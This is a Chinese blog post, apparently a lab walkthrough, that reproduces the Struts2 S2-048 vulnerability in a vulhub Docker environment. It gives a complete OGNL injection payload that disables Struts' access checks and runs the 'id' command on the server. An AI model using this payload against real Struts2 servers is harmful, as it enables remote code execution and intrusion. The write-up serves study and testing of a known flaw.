Struts2反序列化漏洞复现

简介: 环境: vulhub环境搭建进入s2-048目录

环境: vulhub


环境搭建

进入s2-048目录


image.png


切换root用户


image.png


启动漏洞环境 docker-compose up -d


image.png


漏洞复现

浏览器访问 showcase


image.png

image.png

Gangster Name输入 ${233*233} , 其余随便填


image.png

将Gangster Name输入一下payload , 其余随便填

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

image.png

image.png




相关文章
|
7月前
|
安全 Ubuntu
反序列化漏洞演示
反序列化漏洞演示
61 2
|
7月前
|
Java 关系型数据库 MySQL
网络安全-JDBC反序列化漏洞与RCE
网络安全-JDBC反序列化漏洞与RCE
244 0
|
3月前
|
安全 Java 应用服务中间件
渗透测试-JBoss 5.x/6.x反序列化漏洞
渗透测试-JBoss 5.x/6.x反序列化漏洞
55 14
|
存储 安全 前端开发
springboot下xss漏洞的修复
还有很多修复方式,比如可以利用springcloud gateway进行过滤,但是主要应用本身也要进行加固,网关只能过滤外部威胁
666 0
|
负载均衡 Dubbo 安全
Dubbo反序列化漏洞复现分析
Dubbo反序列化漏洞复现分析
|
安全 Dubbo 应用服务中间件
Dubbo反序列化漏洞复现分析(二)
Dubbo反序列化漏洞复现分析(二)
|
安全 Java Apache
Apache-CommonsCollections反序列化漏洞分析
Apache-CommonsCollections反序列化漏洞分析
|
Java Shell Maven
Fashjson1.2.27反序列化复现
Fashjson1.2.27反序列化复现
Fashjson1.2.27反序列化复现
|
设计模式 安全 前端开发
|
XML 安全 Java